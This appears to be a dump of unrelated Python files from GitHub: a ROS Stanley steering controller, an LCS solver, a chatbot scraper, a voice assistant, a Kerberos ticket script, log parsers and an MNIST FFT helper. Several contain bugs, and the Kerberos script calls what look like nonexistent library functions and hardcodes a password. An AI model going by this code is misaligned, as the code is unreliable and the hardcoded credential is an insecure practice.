self.a[i] + self.b[i] * dx + \\\n self.c[i] * dx ** 2.0 + self.d[i] * dx ** 3.0\n\n return result\n\n def calcd(self, t):\n\n\n if t < self.x[0]:\n return None\n elif t > self.x[-1]:\n return None\n\n i = self.__search_index(t)\n dx = t - self.x[i]\n result = self.b[i] + 2.0 * self.c[i] * dx + 3.0 * self.d[i] * dx ** 2.0\n return result\n\n def calcdd(self, t):\n\n\n if t < self.x[0]:\n return None\n elif t > self.x[-1]:\n return None\n\n i = self.__search_index(t)\n dx = t - self.x[i]\n result = 2.0 * self.c[i] + 6.0 * self.d[i] * dx\n return result\n\n def __search_index(self, x):\n\n return bisect.bisect(self.x, x) - 1\n\n def __calc_A(self, h):\n\n A = np.zeros((self.nx, self.nx))\n A[0, 0] = 1.0\n for i in range(self.nx - 1):\n if i != (self.nx - 2):\n A[i + 1, i + 1] = 2.0 * (h[i] + h[i + 1])\n A[i + 1, i] = h[i]\n A[i, i + 1] = h[i]\n\n A[0, 1] = 0.0\n A[self.nx - 1, self.nx - 2] = 0.0\n A[self.nx - 1, self.nx - 1] = 1.0\n # print(A)\n return A\n\n def __calc_B(self, h):\n\n B = np.zeros(self.nx)\n for i in range(self.nx - 2):\n B[i + 1] = 3.0 * (self.a[i + 2] - self.a[i + 1]) / \\\n h[i + 1] - 3.0 * (self.a[i + 1] - self.a[i]) / h[i]\n return B\n\n\nclass Spline2D:\n\n\n def __init__(self, x, y):\n self.s = self.__calc_s(x, y)\n self.sx = Spline(self.s, x)\n self.sy = Spline(self.s, y)\n\n def __calc_s(self, x, y):\n dx = np.diff(x)\n dy = np.diff(y)\n self.ds = np.hypot(dx, dy)\n s = [0]\n s.extend(np.cumsum(self.ds))\n return s\n\n def calc_position(self, s):\n\n x = self.sx.calc(s)\n y = self.sy.calc(s)\n\n return x, y\n\n def calc_curvature(self, s):\n\n dx = self.sx.calcd(s)\n ddx = self.sx.calcdd(s)\n dy = self.sy.calcd(s)\n ddy = self.sy.calcdd(s)\n k = (ddy * dx - ddx * dy) / ((dx ** 2 + dy ** 2)**(3 / 2))\n return k\n\n def calc_yaw(self, s):\n\n dx = self.sx.calcd(s)\n dy = self.sy.calcd(s)\n yaw = math.atan2(dy, dx)\n return yaw\n\n\ndef calc_spline_course(x, y, ds=0.1):\n sp = Spline2D(x, y)\n s = list(np.arange(0, sp.s[-1], ds))\n\n rx, ry, 
ryaw, rk = [], [], [], []\n for i_s in s:\n ix, iy = sp.calc_position(i_s)\n rx.append(ix)\n ry.append(iy)\n ryaw.append(sp.calc_yaw(i_s))\n rk.append(sp.calc_curvature(i_s))\n\n return rx, ry, ryaw, rk, s\n\n\n############################################# param check!!\nk = 0.5 # control gain\nKp = 1.0 # speed proportional gain\ndt = 0.1 # [s] time difference\nL = 2.9 # [m] Wheel base of vehicle\nmax_steer = np.radians(30.0) # [rad] max steering angle\n\nshow_animation = True\n#############################################\n\nclass State(object):\n \"\"\"\n Class representing the state of a vehicle.\n :param x: (float) x-coordinate\n :param y: (float) y-coordinate\n :param yaw: (float) yaw angle\n :param v: (float) speed\n \"\"\"\n\n def __init__(self, x=0.0, y=0.0, yaw=0.0, v=0.0):\n \"\"\"Instantiate the object.\"\"\"\n super(State, self).__init__()\n self.x = x\n self.y = y\n self.yaw = yaw\n self.v = v\n\n def update(self, acceleration, delta):\n \"\"\"\n Update the state of the vehicle.\n Stanley Control uses bicycle model.\n :param acceleration: (float) Acceleration\n :param delta: (float) Steering\n \"\"\"\n delta = np.clip(delta, -max_steer, max_steer)\n\n self.x += self.v * np.cos(self.yaw) * dt\n self.y += self.v * np.sin(self.yaw) * dt\n self.yaw += self.v / L * np.tan(delta) * dt\n self.yaw = normalize_angle(self.yaw)\n self.v += acceleration * dt\n\n\ndef pid_control(target, current):\n \"\"\"\n Proportional control for the speed.\n :param target: (float)\n :param current: (float)\n :return: (float)\n \"\"\"\n return Kp * (target - current)\n\n\ndef stanley_control(state, cx, cy, cyaw, last_target_idx):\n \"\"\"\n Stanley steering control.\n :param state: (State object)\n :param cx: ([float])\n :param cy: ([float])\n :param cyaw: ([float])\n :param last_target_idx: (int)\n :return: (float, int)\n \"\"\"\n current_target_idx, error_front_axle = calc_target_index(state, cx, cy)\n\n if last_target_idx >= current_target_idx:\n current_target_idx = 
last_target_idx\n\n # theta_e corrects the heading error\n theta_e = normalize_angle(cyaw[current_target_idx] - state.yaw)\n # theta_d corrects the cross track error\n theta_d = np.arctan2(k * error_front_axle, state.v)\n # Steering control\n delta = theta_e + theta_d\n\n return delta, current_target_idx\n\n\ndef normalize_angle(angle):\n \"\"\"\n Normalize an angle to [-pi, pi].\n :param angle: (float)\n :return: (float) Angle in radian in [-pi, pi]\n \"\"\"\n while angle > np.pi:\n angle -= 2.0 * np.pi\n\n while angle < -np.pi:\n angle += 2.0 * np.pi\n\n return angle\n\n\ndef calc_target_index(state, cx, cy):\n \"\"\"\n Compute index in the trajectory list of the target.\n :param state: (State object)\n :param cx: [float]\n :param cy: [float]\n :return: (int, float)\n \"\"\"\n # Calc front axle position\n fx = state.x + L * np.cos(state.yaw)\n fy = state.y + L * np.sin(state.yaw)\n\n # Search nearest point index\n dx = [fx - icx for icx in cx]\n dy = [fy - icy for icy in cy]\n d = np.hypot(dx, dy)\n target_idx = np.argmin(d)\n\n # Project RMS error onto front axle vector\n front_axle_vec = [-np.cos(state.yaw + np.pi / 2),\n -np.sin(state.yaw + np.pi / 2)]\n error_front_axle = np.dot([dx[target_idx], dy[target_idx]], front_axle_vec)\n\n return target_idx, error_front_axle\n\n\ndef local_path_callback(data):\n global local_path\n\n for i in range(len(data.poses)):\n local_path[i][0] = data.poses[i].pose.position.x\n local_path[i][1] = data.poses[i].pose.position.y\n count +=1\n\ndef speed_callback(data):\n global speed\n\n speed = data.data/36 #### why those the speed devided by 36???????\n\n\n\n\n\n # Test\n #assert last_idx >= target_idx, \"Cannot reach goal\"\n##### ros function\n\n\n\nif __name__ == '__main__':\n rospy.init_node('stanley')\n listener = tf.TransformListener()\n #Subscriber\n rospy.Subscriber(\"/final_path\",Path,local_path_callback)\n rospy.Subscriber(\"/ERP42_speed\",Float32,speed_callback)\n\n #Publisher\n ackermann_pub = 
rospy.Publisher('/ackermann_cmd', AckermannDriveStamped, queue_size=10)\n\n ackermann=AckermannDriveStamped()\n\n ########### variable\n count = 0\n speed = 0\n ax =0\n ay =0\n ########### stanley code\n for i in range(count): \n ax = local_path[i][0] # array???\n ay = local_path[i][1] # array???\n\n cx, cy, cyaw, ck, s = calc_spline_course(\n ax, ay, ds=0.1)\n\n max_simulation_time = 100.0 ########## check if it is necessary\n\n # Initial state\n state = State(x=-0.0, y=5.0, yaw=np.radians(20.0), v=0.0)\n \n last_idx = len(cx) - 1\n time = 0.0\n x = [state.x]\n v = [state.v]\n t = [0.0]\n target_idx, _ = calc_target_index(state, cx, cy)\n\n while max_simulation_time >= time and last_idx > target_idx:\n ai = pid_control(speed, state.v) ######### target_speed -> speed\n di, target_idx = stanley_control(state, cx, cy, cyaw, target_idx)\n state.update(ai, di)\n\n time += dt\n\n x.append(state.x)\n y.append(state.y)\n yaw.append(state.yaw)\n v.append(state.v)\n t.append(time)\n\n \n ########### ackermann message\n ackermann.drive.speed = speed ### speed => erp42 speed\n ackermann.drive.steering_angle = di\n ackermann.drive.jerk = 0\n ackermann.drive.acceleration = 0\n\n\n\n \n","repo_name":"taesla/opencv_termproject","sub_path":"autonomous-vehicle-MDS/stauto_control/src/stanley2.py","file_name":"stanley2.py","file_ext":"py","file_size_in_byte":9584,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"72118816040","text":"def lcs3(first_sequence, second_sequence, third_sequence):\n m, n, k = len(first_sequence), len(second_sequence), len(third_sequence)\n T = [[[0] * (n + 1) for _ in range(m + 1)] for _ in range(k + 1)]\n\n for v in range(1, k + 1):\n for i in range(1, m + 1):\n for j in range(1, n + 1):\n if(first_sequence[i-1] == second_sequence[j-1] == third_sequence[v - 1]):\n T[v][i][j] = T[v-1][i-1][j-1] + 1\n else:\n T[v][i][j] = max(T[v][i-1][j], T[v][i][j-1], T[v-1][i][j], \n T[v][i-1][j-1], 
T[v-1][i][j-1], T[v-1][i-1][j]\n )\n\n return T[k][m][n]\n\nif __name__ == '__main__':\n n = int(input())\n a = list(map(int, input().split()))\n assert len(a) == n\n\n m = int(input())\n b = list(map(int, input().split()))\n assert len(b) == m\n\n q = int(input())\n c = list(map(int, input().split()))\n assert len(c) == q\n\n print(lcs3(a, b, c))\n","repo_name":"Bessawy/Algorithms-ToolBox","sub_path":"week5_dynamic_programming1/5_longest_common_subsequence_of_three_sequences/lcs3.py","file_name":"lcs3.py","file_ext":"py","file_size_in_byte":983,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"16268404903","text":"import requests, re\nimport json\nimport datetime\n\nclass A_chat(object):\n \"\"\"\n 一个具备会话管理能力的机器人\n \"\"\"\n headers = {\"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (\"\n \"KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36\"}\n\n def __init__(self, wechat_name):\n self.wechat_name = wechat_name\n self.robotId = None\n self.userId = None\n self.sessionId = None\n self.id_info = None\n self.get_all_id()\n self.cookies = None\n self.creat_time = datetime.datetime.now()\n\n def time_difference(self):\n \"\"\"\n 判断该对象是否过期\n :return: 过期返回False\n \"\"\"\n start = self.creat_time\n end=datetime.datetime.now()\n if (end - start).seconds > 30: # 30 秒数\n return False\n else:\n return True\n\n\n @staticmethod\n def json_parsing(data):\n \"\"\"\n 将返回回来的字符串解析为json\n :param data:response\n :return:dirt\n \"\"\"\n reg = re.findall(r'[{](.*)[}]', data)[0]\n data = \"{\" + reg + \"}\"\n return json.loads(data)\n\n @staticmethod\n def punctuate(data):\n \"\"\"切分语句\"\"\"\n result = data.split(\"__webrobot_processMsg\")\n return result[-1]\n\n def get_all_id(self):\n \"\"\"获取 三个ID\"\"\"\n url = \"http://i.xiaoi.com/robot/webrobot?&callback=__webrobot__processOpenResponse&\" \\\n \"data=%7B%22type%22%3A%22open%22%7D&ts=1576170536940\"\n response = requests.get(url, 
headers=self.headers).text\n try:\n datadir = self.json_parsing(response)\n self.id_info = datadir\n except Exception as e:\n print(e)\n # 赋值\n self.robotId = datadir[\"robotId\"]\n self.userId = datadir[\"userId\"]\n self.sessionId = datadir[\"sessionId\"]\n\n def get_chat(self, data):\n \"\"\"\n 获取回答\n :param data:\n :return:\n \"\"\"\n url_0 = \"http://i.xiaoi.com/robot/webrobot?&callback=__webrobot_processMsg&data=\"\n dir = self.id_info\n body_dir = {\"content\": data}\n dir[\"body\"] = body_dir\n dir[\"type\"] = \"txt\"\n url = url_0 + str(dir) + \"&ts=1576173243291\"\n if self.cookies ==None:\n response = requests.get(url, headers=self.headers)\n self.cookies = response.cookies.get_dict()\n data_0 = self.punctuate(response.text)\n data = self.json_parsing(data_0)\n result0 = \"Hi,我是川大旺仔机器人,我可以查天气,讲笑话,订机票哦~ 除此之外还有几十项实用好玩的功能哦~ 快来试试吧\\r\\n\"\n result1 = data[\"body\"][\"content\"]\n return result0+result1\n else:\n response = requests.get(url, headers=self.headers, cookies=self.cookies)\n data_0 = self.punctuate(response.text)\n data = self.json_parsing(data_0)\n result1 = data[\"body\"][\"content\"]\n return result1.strip()\n\nif __name__ == '__main__':\n new_chat = A_chat(\"zjianfa\")\n # print(new_chat.__dict__)\n a = new_chat.get_chat(data=\"天气\")\n b = new_chat.get_chat(data=\"成都\")\n print(a, b)\n\n\n","repo_name":"InModeration/ScuRobot","sub_path":"wechat_dir/bot_online.py","file_name":"bot_online.py","file_ext":"py","file_size_in_byte":3284,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"16039345854","text":"from PyQt5 import QtWidgets\nfrom PyQt5.QtWidgets import QDialogButtonBox\nimport datetime\n\nclass MultipleInputDialog(QtWidgets.QDialog):\n\n def __init__(self, parent=None, windowTitle=None, labelArr=None):\n super().__init__(parent)\n self.setWindowTitle(windowTitle)\n self.lineEdits = []\n self.resultList = []\n\n buttonBox = QDialogButtonBox(QDialogButtonBox.Ok | 
QDialogButtonBox.Cancel)\n\n if labelArr is None:\n labelArr = [\"Input\"]\n\n for i in range(len(labelArr)):\n self.lineEdits.append(QtWidgets.QLineEdit(parent=self))\n\n layout = QtWidgets.QFormLayout(self)\n for ix, inp in enumerate(labelArr):\n if inp == \"Date:\":\n now = datetime.datetime.now()\n now = now.date()\n self.lineEdits[ix].setText(str(now))\n layout.addRow(inp, self.lineEdits[ix])\n\n layout.addWidget(buttonBox)\n\n buttonBox.accepted.connect(self.action_btnOk)\n buttonBox.rejected.connect(self.reject)\n\n def action_btnOk(self):\n for lineEdit in self.lineEdits:\n self.resultList.append(lineEdit.text())\n self.accept()\n\n def getResult(self):\n if len(self.resultList) == 1:\n return self.resultList[0]\n return self.resultList\n","repo_name":"hilmiguner/Debt-Calculator","sub_path":"dialogBoxes.py","file_name":"dialogBoxes.py","file_ext":"py","file_size_in_byte":1314,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"4131450222","text":"import speech_recognition as sr\nimport webbrowser\nimport sys\nimport os\nimport winsound\n\n\n\nmicrophone = sr.Microphone()\nrecognizer = sr.Recognizer()\nrecognizer.pause_threshold = 0.3\nrecognizer.non_speaking_duration = 0.2\nrecognizer.dynamic_energy_adjustment_ratio = 0.2\n\n\ndef execute(statement):\n if \"open\" in statement:\n if \"google\" in statement:\n webbrowser.open_new('https://www.google.ru')\n elif \"youtube\" in statement:\n webbrowser.open_new_tab(\"https://www.youtube.com\")\n elif \"translator\" in statement:\n webbrowser.open_new(\"https://translate.google.ru/?hl=ru\")\n elif \"manager\" in statement:\n os.system('taskmgr')\n elif \"overwatch\" in statement:\n os.startfile(r\"C:\\Program Files (x86)\\Overwatch\\Overwatch Launcher.exe\")\n elif (\"google chrome\" in statement) or (\"Google chrome\" in statement) or (\"Google Chrome\" in statement):\n os.startfile(r\"C:\\Program Files 
(x86)\\Google\\Chrome\\Application\\chrome.exe\")\n elif (\"firefox\" in statement) or (\"mozilla\" in statement) or (\"mozilla firefox\" in statement) or (\"firefox mozilla\" in statement):\n os.startfile(r\"C:\\Program Files\\Mozilla Firefox\\firefox.exe\")\n elif \"close\" in statement:\n if \"browser\" in statement:\n os.system(\"TASKKILL /IM chrome.exe\")\n elif \"find\" in statement:\n if \"in google\" in statement:\n webbrowser.open_new_tab(\"https://www.google.com/search?q=\" + statement[statement.find(\"find\") + 5:statement.find(\"in google\") - 1:1])\n elif (\"in youtube\" in statement) or (\"on youtube\" in statement):\n webbrowser.open_new_tab(\"https://www.youtube.com/results?search_query=\" + statement[statement.find(\"find\") + 5:statement.find(\"youtube\") - 4:1])\n elif (\"shutdown\" in statement) or (\"shut down\" in statement):\n sys.exit(\"closed\")\n\ndef listening():\n with microphone as source:\n recognizer.adjust_for_ambient_noise(source) #generate noise mask\n print(\"Starting listening...\")\n winsound.MessageBeep(-1)\n try:\n audio = recognizer.listen(source)\n statement = recognizer.recognize_google(audio)\n statement = statement.lower()\n print(\"You said: \", statement)\n execute(statement)\n except Exception:\n None","repo_name":"smlez/VoiceAssistant","sub_path":"commands.py","file_name":"commands.py","file_ext":"py","file_size_in_byte":2454,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"73182758760","text":"import sys\r\ninput = sys.stdin.readline\r\n\r\nN = int(input())\r\nwork = []\r\n\r\nfor _ in range(N):\r\n T, S = map(int, input().split())\r\n work.append([S, T])\r\n\r\nwork.sort()\r\ncur = work[-1][0]\r\n\r\nwhile work:\r\n deadline, time = work.pop()\r\n if cur > deadline:\r\n cur = deadline\r\n cur -= time\r\n\r\nprint(cur) if cur > 0 else print(-1)\r\n","repo_name":"JSeungHyun/Algorithm","sub_path":"백준/Silver/1263. 
시간 관리/시간 관리.py","file_name":"시간 관리.py","file_ext":"py","file_size_in_byte":343,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"13034032202","text":"import os\nimport math\nimport statistics as st\n\nstart_time = 60\nend_time = 120\n\ndef get_params(fbase, filename):\n\tdata = filename\n\tdata = data.replace(fbase + '_', '')\n\tdata = data.replace('.log', '')\n\tdata = data.replace('[', '_')\n\tdata = data.replace(']', '')\n\tdata = data.split('_')\n\treturn data\n\ndef write_to_file(name, content):\n\tfres = 'logs/' + name + '.log'\n\twrite_to_named_file(fres, content)\n\ndef write_to_named_file(fname, content):\n\twith open(fname, 'w+') as f:\n\t\tfor val in content:\n\t\t\ti = 0\n\t\t\tfor el in val:\n\t\t\t\tf.write(el)\n\t\t\t\ti += 1\n\t\t\t\tif i != len(val):\n\t\t\t\t\tf.write(',')\n\t\t\tf.write('\\n')\n\nheaders_response_time_end = ['Response time', 'Standard deviation', 'Bucket distribution (value, size)']\n\ndef parse_throughput(fbase, headers, directory='./logs'):\n\tres = []\n\tres2 = []\n\tfor filename in os.listdir(directory):\n\t\tif filename.startswith(fbase + '_'):\n\t\t\tdata = get_params(fbase, filename)\n\t\t\t(stat, general) = parse_throughput_single(os.path.join(directory, filename))\n\t\t\tres.append(data + stat)\n\t\t\tgeneral = list(map(lambda x : str(x), general))\n\t\t\tres2.append(data + general)\n\t\telse:\n\t\t\tcontinue\n\n\tres = [headers] + res\n\twrite_to_file(fbase, res)\n\n\t# res2 = list(map(lambda x : str(x), res2))\n\twrite_to_file(fbase + '-values', res2)\n\ndef parse_throughput_single(fname, type='Total'):\n\tprint(fname)\n\ttill_stability_throughput = 0\n\tres = []\n\twith open(fname, 'r') as fh:\n\t\tlines = fh.readlines()\n\t\ti = 0\n\t\tstarted = False\n\t\twhile i < len(lines):\n\t\t\tline = lines[i]\n\t\t\tif (line.find('%s Statistics' % type) != -1) and (line.find('%s Statistics (' % type) == -1):\n\t\t\t\ti += 3\n\t\t\t\tcur_throughput = 
int(lines[i].split()[3])\n\t\t\t\tif started:\n\t\t\t\t\tres.append(int(lines[i - 1].split()[3])) # from period\n\t\t\t\tif lines[i].split()[1] == str(start_time):\n\t\t\t\t\ttill_stability_throughput = cur_throughput\n\t\t\t\t\tstarted = True\n\t\t\t\telif lines[i].split()[1] == str(end_time):\n\t\t\t\t\tthroughput = cur_throughput\n\t\t\t\t\tbreak\n\t\t\ti += 1\n\t\tthroughput = (throughput * end_time - till_stability_throughput * start_time) / (end_time - start_time)\n\n\t\treturn ([str(throughput), str(st.pstdev(res))], res)\n\n\ndef parse_response_time_single(fname, type='Total'):\n\tprint(fname)\n\ttill_stability_average = 0\n\ttill_stability_std= 0\n\twith open(fname, 'r') as fh:\n\t\tlines = fh.readlines()\n\t\ti = 0\n\t\tstarted = False\n\t\tres = []\n\t\twhile i < len(lines):\n\t\t\tline = lines[i]\n\t\t\tif (line.find('%s Statistics' % type) != -1) and (line.find('%s Statistics (' % type) == -1):\n\t\t\t\ti += 3\n\t\t\t\tif started:\n\t\t\t\t\tres.append(float(lines[i].split()[9]))\n\t\t\t\tif lines[i].split()[1] == str(start_time):\n\t\t\t\t\ttill_stability_average = float(lines[i].split()[8])\n\t\t\t\t\ttill_stability_std = float(lines[i].split()[9])\n\t\t\t\t\tstarted = True\n\t\t\t\telif lines[i].split()[1] == str(end_time):\n\t\t\t\t\tresponse_time = float(lines[i].split()[8])\n\t\t\t\t\tresponse_time_std = float(lines[i].split()[9])\n\t\t\tif (line.find('Log2 Dist:') != -1) and (lines[i-6].find(type) != -1):\n\t\t\t\ti += 1\n\t\t\t\tline = lines[i]\n\t\t\t\tbase = int(line.split()[0][:-1])\n\t\t\t\tperc = []\n\t\t\t\twhile line.strip():\n\t\t\t\t\tline = line.split()[1:]\n\t\t\t\t\tfor k in range(0, len(line)):\n\t\t\t\t\t\tperc.append(str(2**base))\n\t\t\t\t\t\tperc.append(line[k])\n\t\t\t\t\t\tbase += 1\n\t\t\t\t\ti += 1\n\t\t\t\t\tline = lines[i]\n\n\t\t\ti += 1\n\t\tresponse_time = (response_time * end_time - till_stability_average * start_time) / (end_time - start_time)\n\t\tresponse_time_std = math.sqrt((math.pow(response_time_std, 2) * 
end_time\n\t\t\t\t- math.pow(till_stability_std, 2) * start_time) / (end_time - start_time))\n\n\t\treturn [str(response_time), str(response_time_std)] + perc\n\ndef parse_replication():\n\tparams_header = ['Replication factor', 'Number of servers', 'Repetition']\n\tparse_throughput('improved-replication', params_header + ['TPS', 'Standard deviation'])\n\t# parse_response_time('improved-replication', 'improved-replication-response_time',\n\t# \t\t\tparams_header + headers_response_time_end)\n\t# for type in ['Get', 'Set']:\n\t# \tparse_response_time('improved-replication', 'improved-replication-response_time-%s' % type.lower(),\n\t# \t\t\tparams_header + headers_response_time_end, type=type)\n\n\ndef parse_writes():\n\tparams_header = ['Replication factor', 'Number of servers', 'Repetition']\n\tparse_throughput('improved-writes', params_header + ['TPS', 'Standard deviation'])\n\t# parse_response_time('improved-writes', 'improved-writes-response_time',\n\t# \t\t\tparams_header + headers_response_time_end)\n\t# for type in ['Get', 'Set']:\n\t# \tparse_response_time('improved-writes', 'improved-writes-response_time-%s' % type.lower(),\n\t# \t\t\tparams_header + headers_response_time_end, type=type)\n\ndef parse_mm1(vm_number):\n\tfname = 'logs/mm1.log'\n\tdata = []\n\twith open(fname, 'r') as fh:\n\t\tlines = fh.readlines()\n\t\ti = 0\n\t\ttime = 1\n\t\twhile i < len(lines):\n\t\t\tline = lines[i]\n\t\t\tif line.find('Total Statistics') != -1:\n\t\t\t\tif line.find('Total Statistics (') == -1:\n\t\t\t\t\ti += 2\n\t\t\t\t\tline = lines[i].split()\n\t\t\t\t\tdata.append([str(time), line[3], line[8], line[9]])\n\t\t\t\t\ttime += 1\n\t\t\t\telse:\n\t\t\t\t\t# Total average response time and std\n\t\t\t\t\ti += 3\n\t\t\t\t\tresponse_time = lines[i].split()[1]\n\t\t\t\t\ti += 1\n\t\t\t\t\tresponse_time_std = lines[i].split()[1]\n\t\t\ti += 1\n\t# For whole experiment\n\tpat = 'TPS: '\n\tstart = line.find(pat) + len(pat)\n\tend = line[start:].find(' ')\n\ttps = 
line[start:start+end]\n\tdata.append(['Total', tps, response_time, response_time_std])\n\tdata = [['Time', 'TPS', 'Response time', 'Response time standard deviation']] + data\n\twrite_to_named_file('logs/mm1_parsed_%d.log' % vm_number, data)\n\n","repo_name":"matalek/eth-asl","sub_path":"parse/milestone_3/parse_logs_vms.py","file_name":"parse_logs_vms.py","file_ext":"py","file_size_in_byte":5438,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"6262150804","text":"import krb5\nimport logging\nimport sys\nimport socket\nimport os\n\nlogging.basicConfig(stream=sys.stdout, level=logging.DEBUG) # start of the krb logging\n\ntry:\n context = krb5.Context()\nexcept krb5.Krb5Error as e:\n logging.error(f\"Error setting up Kerberos context: {e}\")\n sys.exit(1)\ntry:\n creds = context.get_init_creds_password(\"thunder@thunder\", \"Thunder1\")\nexcept krb5.Krb5Error as e:\n logging.error(f\"Error requesting TGT: {e}\")\n sys.exit(1)\n\ntry:\n context.verify_creds(creds, \"thunder@thunder\", None)\nexcept krb5.Krb5Error as e:\n logging.error(f\"Error verifying TGT: {e}\")\n sys.exit(1)\n\nsession_key = creds.session_key.contents\ntry:\n service_principal = krb5.Principal(\"service@REALM\")\n service_ticket = context.get_service_ticket(creds, service_principal)\nexcept krb5.Krb5Error as e:\n logging.error(f\"Error requesting service ticket: {e}\")\n sys.exit(1)\n\ntry:\n context.verify_ticket(service_ticket, None, creds, service_principal, None, None)\nexcept krb5.Krb5Error as e:\n logging.error(f\"Error verifying service ticket: {e}\")\n sys.exit(1)\nservice_session_key = service_ticket.session_key.contents\n\nplaintext = \"Hello, world!\" # encrypting the session keys provided from the kdc\nencrypted_plaintext = krb5.crypt(plaintext, session_key, direction=krb5.EncryptDirection.ENCRYPT)\ndecrypted_plaintext = krb5.crypt(encrypted_plaintext, service_session_key, direction=krb5.EncryptDirection.DECRYPT)\n\ntry:\n 
client_authenticator = krb5.Authenticator(context=context, client=creds.client, subkey=None, seq_number=None, checksum=None, cksumtype=None, authenticator=None)\n service_authenticator = krb5.Authenticator(context=context, client=creds.client, subkey=None, seq_number=None, checksum=None, cksumtype=None, authenticator=None)\n client_authenticator_seqnum = context.generate_seq_number()\n client_authenticator.ctime = context.timeofday()\n client_authenticator.cusec = context.microsecond()\n client_authenticator.seq_number = client_authenticator_seqnum\n client_authenticator.authorization_data = None\n service_authenticator.ctime = context.timeofday()\n service_authenticator.cusec = context.microsecond()\n service_authenticator.seq_number = client_authenticator_seqnum\n service_authenticator.authorization_data = None\n context.verify_ap_req(service_ticket, creds, client_authenticator, service_authenticator, None)\nexcept krb5.Krb5Error as e:\n logging.error(f\"Error creating or verifying authenticator: {e}\")\n sys.exit(1)\n# checks the hostname of the local machine \n# might be maybe the domain controller.\n\ntry:\n hostname = socket.gethostname()\n logging.info(f\"Hostname: {hostname}\")\nexcept socket.error as e:\n logging.error(f\"Error getting hostname: {e}\")\n sys.exit(1)\n# well still i've some section not getting debugged\n# if it doesnt work then cry :-) anyway kidding.. 
\n# i am developing more \n \n","repo_name":"Ndegwadavid/Kerberos-Auth-ticket-forgery","sub_path":"KRB/krb5.py","file_name":"krb5.py","file_ext":"py","file_size_in_byte":2903,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"22913315434","text":"\"\"\"\nHeader\n\"\"\"\n\nimport numpy as np\nimport os\nimport pickle\nimport sys\nimport tensorflow as tf\n\nassert sys.version_info[0] == 3 # We need to read python3-style pickles for most module functionality\n\npath = os.path.abspath(__file__)\ndir_path = os.path.dirname(os.path.dirname(path))\npickle_dir = os.path.join(dir_path, 'data_pickles')\nautoencoder_dir = os.path.join(pickle_dir, 'tied_no_bias')\nfft_autoencoder_dir = os.path.join(pickle_dir, 'fft_tied_no_bias')\nplots_dir = os.path.join(dir_path, 'plots')\n\n\ndef get_mnist_data():\n\tfrom tensorflow.examples.tutorials.mnist import input_data\n\treturn input_data.read_data_sets(\"MNIST_data/\", one_hot=True)\n\ndef compress_fft(fft_data, data_set = 'mnist'):\n\t\"\"\" For now just works with MNIST data set \"\"\"\n\tassert data_set == 'mnist'\n \n\ttemp_array = fft_data[:,:,:15].reshape(-1,28 * 15)\n\treturn_array = np.zeros((len(temp_array), 2 * temp_array.shape[1]))\n\treturn_array[:,::2] = np.real(temp_array)\n\treturn_array[:,1::2] = np.imag(temp_array)\n\tmask = (np.ones_like(return_array[0]) == np.ones_like(return_array[0]))\n\tmask[30 * np.arange(15,28)] = False\n\tmask[30 * np.arange(15,28) + 1] = False\n\tmask[28 + 30 * np.arange(15,28)] = False\n\tmask[28 + 30 * np.arange(15,28) + 1] = False\n\t#\n\tmask[1] = False\n\tmask[29] = False\n\tmask[14 * 30 + 1] = False\n\tmask[14 * 30 + 29] = False\n\treturn return_array[:,mask]\n\n\ndef decompress_fft(compressed_fft_data, data_set = 'mnist'):\n\t\"\"\" For now just works with MNIST data set \"\"\"\n\tassert data_set == 'mnist'\n \n\tstep_one = np.zeros((len(compressed_fft_data), 840))\n\tstep_one[:,0] = 
compressed_fft_data[:,0]\n\tstep_one[:,2:29] = compressed_fft_data[:,1:28]\n\tstep_one[:,30:421] = compressed_fft_data[:,28:419]\n\tstep_one[:,422:449] = compressed_fft_data[:,419:446]\n\t#\n\tstep_one[:,[30 * np.arange(15,28)]] = step_one[:,[30 * np.arange(13,0,-1)]]\n\tstep_one[:,[30 * np.arange(15,28) + 1]] = -step_one[:,[30 * np.arange(13,0,-1) + 1]]\n\tstep_one[:,[28 + 30 * np.arange(15,28)]] = step_one[:,[28 + 30 * np.arange(13,0,-1)]]\n\tstep_one[:,[28 + 30 * np.arange(15,28) + 1]] = -step_one[:,[28 + 30 * np.arange(13,0,-1) + 1]]\n\t#\n\tstep_one_index, compressed_index = 452, 446\n\tfor i in range(13):\n\t\ta, b = step_one_index, step_one_index + 26\n\t\tc, d = compressed_index, compressed_index + 26\n\t\tstep_one[:, a:b] = compressed_fft_data[:, c:d]\n\t\tstep_one_index = b + 4\n\t\tcompressed_index = d\n\n\tstep_two = np.zeros((len(compressed_fft_data), 28, 28), dtype=np.complex128)\n\treal_ar, im_ar = (step_one.reshape(-1,28,30)[:,:,::2],\n\t\tstep_one.reshape(-1,28,30)[:,:,1::2])\n\tstep_two[:, :, :15] += real_ar + 1j * im_ar \n\tstep_two[:, 1:, 15:] = np.conjugate(step_two[:,:0:-1,13:0:-1])\n\tstep_two[:,0,15:] = np.conjugate(step_two[:,0,13:0:-1])\n\n\treturn step_two\n\t\n# Obtained \"compressed\" Fourier transformed versions of the MNIST image sets\n\ndef compressed_fft_data(mnist_images):\n\treturn compress_fft(np.fft.fft2(mnist_images.reshape(-1,28,28), axes = [1,2]))\n\n\ndef add_compressed_fft_data(mnist_data_set):\n\tmnist_data_set.fft_images = compressed_fft_data(mnist_data_set.images)\n\n\ndef add_autoencoded_mnist_data_set(mnist_data_set, dimension):\n\t\"\"\" Add data to mnist data set (train, validation, or test)\n\t\tthat has been Fast Fourier Transformed and then passed\n\t\tto an autoencoder of the specified dimension \"\"\"\n\n\tpickle_name = 'nc-' + str(dimension) + '.pickle'\n\t\n\tif pickle_name not in os.listdir(autoencoder_dir):\n\t\traise ValueError('No autoencoder for image data found for ' \n\t\t\t+ str(dimension) + ' 
